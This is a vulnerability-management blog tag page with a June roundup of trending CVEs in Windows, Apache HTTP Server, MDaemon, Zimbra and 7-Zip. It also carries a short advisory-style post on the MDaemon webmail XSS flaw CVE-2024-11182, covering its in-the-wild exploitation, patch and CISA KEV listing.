Tag Archives: MDaemon

June “In the Trend of VM” (#16): vulnerabilities in Microsoft Windows, Apache HTTP Server, the web interfaces of MDaemon and Zimbra, and the 7-Zip archiver

June “In the Trend of VM” (#16): vulnerabilities in Microsoft Windows, Apache HTTP Server, the web interfaces of MDaemon and Zimbra, and the 7-Zip archiver. A traditional monthly vulnerability roundup. 🙂

🗞 Post on Habr (rus)
🗒 Digest on the PT website (rus)

A total of 7 trending vulnerabilities:

🔻 Elevation of Privilege – Microsoft DWM Core Library (CVE-2025-30400)
🔻 Elevation of Privilege – Windows Common Log File System Driver (CVE-2025-32701, CVE-2025-32706)
🔻 Remote Code Execution & Arbitrary File Reading – Apache HTTP Server (CVE-2024-38475)
🔻 Cross Site Scripting – MDaemon Email Server (CVE-2024-11182)
🔻 Cross Site Scripting – Zimbra Collaboration (CVE-2024-27443)
🔻 Remote Code Execution – 7-Zip (BDU:2025-01793)

На русском

About Cross Site Scripting – MDaemon Email Server (CVE-2024-11182)

Leave a reply

About Cross Site Scripting – MDaemon Email Server (CVE-2024-11182). An attacker can send an HTML-formatted email containing malicious JavaScript code embedded in an img tag. If the user opens the email in the MDaemon Email Server’s web interface, the malicious JavaScript code will execute in the context of the web browser window. This allows the attacker to steal credentials, bypass 2FA, and gain access to contacts and email messages.

On November 1, 2024, researchers from ESET discovered that the vulnerability was being exploited in the wild. They linked the exploitation of this and several other vulnerabilities in webmail interfaces (Roundcube: CVE‑2023‑43770, CVE‑2020‑35730; Zimbra: CVE‑2024‑27443; Horde) to a broader operation dubbed “RoundPress”.

MDaemon patched the vulnerability in version 24.5.1 (released Nov 14, 2024), but ESET disclosed attacks and a PoC exploit only on May 15, 2025. 🤷‍♂️ The flaw was added to the CISA KEV catalog on May 19.

На русском

This is my personal blog. The opinions expressed here are my own and not of my employer. All product names, logos, and brands are property of their respective owners. All company, product and service names used here for identification purposes only. Use of these names, logos, and brands does not imply endorsement. You can freely use materials of this site, but it would be nice if you place a link on https://avleonov.com and send message about it at me@avleonov.com or contact me any other way.

Alexander V. Leonov

Vulnerability Management and more

Tag Archives: MDaemon

June “In the Trend of VM” (#16): vulnerabilities in Microsoft Windows, Apache HTTP Server, the web interfaces of MDaemon and Zimbra, and the 7-Zip archiver

About Cross Site Scripting – MDaemon Email Server (CVE-2024-11182)